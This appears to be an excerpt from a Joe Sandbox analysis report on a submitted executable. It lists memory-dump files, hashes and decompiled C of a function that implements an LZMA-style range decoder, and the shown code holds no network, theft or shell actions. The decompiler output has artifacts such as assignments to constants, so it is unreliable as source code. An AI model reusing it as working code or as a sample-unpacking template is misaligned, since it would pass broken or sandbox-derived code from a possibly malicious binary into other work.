                                                    0x00406f62
                                                    0x00406f65
                                                    0x00406f68
                                                    0x00406f6b
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00000000
                                                    0x00000000
                                                    0x004070cf
                                                    0x004070cf
                                                    0x004070d3
                                                    0x00407599
                                                    0x00000000
                                                    0x00407599
                                                    0x004070d9
                                                    0x004070dc
                                                    0x004070df
                                                    0x004070e2
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e7
                                                    0x004070ea
                                                    0x004070ed
                                                    0x004070f0
                                                    0x004070f3
                                                    0x004070f6
                                                    0x004070f7
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070fc
                                                    0x004070ff
                                                    0x00407102
                                                    0x00407105
                                                    0x00407105
                                                    0x00407105
                                                    0x00407108
                                                    0x0040710a
                                                    0x0040710a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040734c
                                                    0x0040734c
                                                    0x0040734c
                                                    0x00407350
                                                    0x00000000
                                                    0x00000000
                                                    0x00407356
                                                    0x00407359
                                                    0x0040735c
                                                    0x0040735f
                                                    0x00407361
                                                    0x00407361
                                                    0x00407361
                                                    0x00407364
                                                    0x00407367
                                                    0x0040736a
                                                    0x0040736d
                                                    0x00407370
                                                    0x00407373
                                                    0x00407374
                                                    0x00407376
                                                    0x00407376
                                                    0x00407376
                                                    0x00407379
                                                    0x0040737c
                                                    0x0040737f
                                                    0x00407382
                                                    0x00407385
                                                    0x00407389
                                                    0x0040738b
                                                    0x0040738e
                                                    0x00000000
                                                    0x00407390
                                                    0x0040710d
                                                    0x0040710d
                                                    0x00000000
                                                    0x0040710d
                                                    0x0040738e
                                                    0x004075c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x004075fa
                                                    0x004075fa
                                                    0x00000000
                                                    0x004075fa
                                                    0x00407447
                                                    0x004073ce
                                                    0x004073cb
                                                    0x00000000
                                                    0x00407002

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                    • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                    • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                    • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
